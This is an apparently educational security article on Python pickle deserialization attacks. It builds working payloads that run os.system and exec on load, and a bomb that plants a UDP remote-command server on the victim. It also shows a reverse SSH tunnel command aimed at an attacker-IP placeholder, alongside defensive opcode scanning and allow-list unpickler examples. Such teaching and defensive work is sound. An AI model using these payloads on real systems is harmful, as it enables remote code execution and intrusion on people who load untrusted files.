Python Deserialization Attack: How to Build a Pickle Bomb
This article introduces a classic, insecure Python data serialization feature (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:
We will follow three steps, with program code, to show how deserialization attacks work:
Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.
Introduction
Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. There are several Common Vulnerabilities and Exposures (CVE) entries related to Python pickle deserialization vulnerabilities:
Introduction to Python Data Serialization
In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:
# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': set(['CT100', 'COM3', 3])  # set data is not supported by json
    }
})
For such complex data objects, formats like JSON, YAML, or XML are not suitable without extra conversion code. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).
import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)
Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The dumped bytes and the reloaded object are shown below:
This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.
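The difference between the two approaches can be sketched in a few lines. The `record` dictionary below is a trimmed, illustrative stand-in for the data structure above, not part of the original programs; it only keeps the set field that trips up the json module.

```python
import json
import pickle

# Illustrative, trimmed-down record that contains a set value.
record = {'Port': 3001, 'CfgSet': {'CT100', 'COM3', 3}}

# The json module has no encoding for set objects and raises TypeError.
try:
    json.dumps(record)
    json_ok = True
except TypeError as err:
    json_ok = False
    print('json.dumps failed:', err)

# pickle round-trips the same object without extra conversion code.
restored = pickle.loads(pickle.dumps(record))
print('pickle round trip equal:', restored == record)
```

This convenience is exactly what makes pickle attractive, and it is also why the security trade-off discussed in the next section matters.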
Introduction to Python Deserialization Vulnerabilities
Using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk:
The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:
The __reduce__() method can return a callable along with a tuple of arguments for it. When the data is deserialized, the callable is invoked with those arguments. Here is an example of a simple serialized data loader that can load both binary and text format data:
# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
    choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
    if choice == '1':
        orignalData = None
        with open('data.pkl', 'rb') as fh:
            orignalData = pickle.load(fh)
        print(orignalData)
    elif choice == '2':
        dataStr = None
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        orignalData = pickle.loads(base64.b64decode(dataStr))
        print(orignalData)
    else:
        print("Exit....")
        exit()
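To see the __reduce__() mechanism in isolation, here is a deliberately harmless sketch. The class name `ReduceDemo` and the choice of the built-in `sorted` as the returned callable are assumptions made for illustration only; the point is that the value produced by unpickling is whatever the returned callable produces, not an instance of the original class.

```python
import pickle

class ReduceDemo:
    """Illustrative class: tells pickle to rebuild it by calling sorted([3, 1, 2])."""
    def __reduce__(self):
        # pickle stores a reference to the callable plus its argument tuple.
        return sorted, ([3, 1, 2],)

payload = pickle.dumps(ReduceDemo())

# During loading, pickle imports builtins.sorted and calls it with the stored arguments.
result = pickle.loads(payload)
print(type(result).__name__, result)
```

The loader never sees a `ReduceDemo` object. It simply calls the function named in the byte stream, which is why the choice of callable is the whole security question.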
To build a simple Python pickle bomb, we can override the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:
import os
import pickle
import base64
# a simple pickle bomb to run a command
class PickleCmd:
    def __reduce__(self):
        cmd = ('uname -a')
        return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)
When we run this script, it will create two data files: a binary data file (`data.pkl`) and a text data file (`data.txt`). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:
With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.
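From the defender's side, a pickle byte stream can be inspected without loading it. The sketch below uses the standard pickletools.genops() iterator to list opcodes that import or call objects. The helper name `find_call_opcodes` and the chosen opcode set are assumptions for illustration. This is a rough heuristic, not a guarantee: legitimate pickles of class instances use the same opcodes, so a hit means "review before loading" rather than "malicious".

```python
import pickle
import pickletools

# Opcodes that import a global or invoke a callable while loading.
CALL_OPCODES = {'GLOBAL', 'STACK_GLOBAL', 'REDUCE', 'INST', 'OBJ', 'NEWOBJ', 'NEWOBJ_EX'}

def find_call_opcodes(data: bytes) -> set:
    """Return the names of import/call opcodes present, without unpickling the data."""
    found = set()
    for opcode, _arg, _pos in pickletools.genops(data):
        if opcode.name in CALL_OPCODES:
            found.add(opcode.name)
    return found

# A pickle that holds only plain containers and scalars.
plain = pickle.dumps({'Port': 3001, 'value': [1.2, 1.3]})

class CallsBuiltin:
    """Harmless stand-in for a crafted object: asks pickle to call sorted()."""
    def __reduce__(self):
        return sorted, ([3, 1, 2],)

crafted = pickle.dumps(CallsBuiltin())

print('plain  :', find_call_opcodes(plain))
print('crafted:', find_call_opcodes(crafted))
```

A scan like this can serve as a pre-check in a file intake pipeline, but it does not replace the rule of loading pickle data only from trusted sources.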
Build a Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.
Clarification on Command Execution
Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:
class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)
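If we rebuild and reload the new pickle bomb, you can see that the additional commands are not executed by the loader:
The body of __reduce__() runs only when the object is pickled, that is, on the machine that builds the data file. Only the callable and arguments returned by __reduce__() are stored in the pickle and executed during deserialization. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse shell command. For example: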
cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')
However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.
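As a harmless illustration of how exec() behaves, the sketch below runs a short code string inside an explicit namespace dictionary. The variable names `snippet` and `namespace` are assumptions for this example only.

```python
# A short piece of Python source held as a string.
snippet = "total = sum(range(5))"

# exec() runs the string; names it defines land in the supplied namespace dict.
namespace = {}
exec(snippet, namespace)

print(namespace['total'])
```

Because exec() accepts any source string, whoever controls the string controls what runs, which is the property the improved pickle bomb relies on.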
Improving the Pickle Bomb Program
Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:
import pickle
import base64
codeContent = """
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# a simple pickle bomb to run Python code
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)
After loading the data file, you will see that the Python code to create a file is executed:
By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.
Building a More Complex Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. With this approach, the red team's IP address is not embedded in the payload, so it is not exposed even if the bomb file is discovered.
Here is the UDP server program:
# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
    data, address = udpServer.recvfrom(BUFFER_SZ)
    cmdMsg = data.decode('utf-8')
    if cmdMsg == '': continue
    if cmdMsg == 'exit': exit()
    result = 'Command not found!'
    try:
        result = subprocess.check_output(cmdMsg, shell=True).decode()
    except Exception as err:
        result = str(err)
    udpServer.sendto(result.encode('utf-8'), address)
Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:
# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64
# Serialized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None
with open(fileName, 'r') as fh:
    dataStr = fh.read()
class PickleBomb:
    def __reduce__(self):
        return exec, (dataStr,)
obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)
Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:
We can then use a simple UDP client program to connect to the victim's IP address and run commands:
As shown, we can check the folder structure and network information of the victim.
Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.
Mitigations for Python Deserialization Attacks
To prevent Python deserialization attacks, there are several points we can follow:
1. Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
2. Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
3. Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
4. Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
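When pickle cannot be avoided, the official pickle documentation describes restricting which globals may be loaded by overriding Unpickler.find_class(). The sketch below follows that pattern. The allow-list contents and the names `RestrictedUnpickler`, `restricted_loads`, and `CallsBuiltin` are assumptions chosen for this example, and the approach reduces the attack surface rather than making untrusted pickles safe.

```python
import builtins
import io
import pickle

# Illustrative allow-list: only these harmless builtins may be referenced by a pickle.
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the byte stream asks to import a global object.
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    """Like pickle.loads(), but rejects any global that is not on the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data still loads normally.
safe_value = restricted_loads(pickle.dumps({'CfgSet': {'CT100', 'COM3', 3}}))

class CallsBuiltin:
    """Harmless stand-in for a crafted object: asks pickle to call sorted()."""
    def __reduce__(self):
        return sorted, ([3, 1, 2],)

# A pickle that references a callable outside the allow-list is rejected.
try:
    restricted_loads(pickle.dumps(CallsBuiltin()))
    blocked = False
except pickle.UnpicklingError as err:
    blocked = True
    print('rejected:', err)
```

The same rejection applies to os.system or exec, since neither is on the allow-list. Keeping the list as small as the application's data model permits is the main design choice here.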
Conclusion and Reference
Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.
Reference:
Demo Step and Program execution
For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:
# Created: 2024/07/06
# Version: v0.1.1
# Copyright: Copyright (c) 2024 LiuYuancheng
# License: MIT License
Thanks for taking the time to read this article. If you have any questions or suggestions, or find any program bugs, please feel free to message me. Comments and advice for improvement are very welcome, so that we can make our work better.